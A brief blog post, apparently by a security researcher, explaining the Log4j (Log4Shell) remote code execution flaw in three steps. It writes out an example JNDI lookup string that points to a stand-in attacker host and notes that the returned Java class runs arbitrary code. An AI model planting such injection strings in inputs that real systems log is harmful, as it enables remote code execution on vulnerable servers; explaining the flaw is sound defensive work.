Log4j 0-day RCE: Top companies affected

  1. We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
  2. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
  3. In the response, a JAVA class is given, which allows you to execute arbitrary code.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
YevhSec1

YevhSec1

MSc in Cyber Security, OSCP and CEH Master certified. Awarded by Apple, Trello, Kraken... Connect me: https://www.linkedin.com/in/yevhenii-molchanov-aa565210b/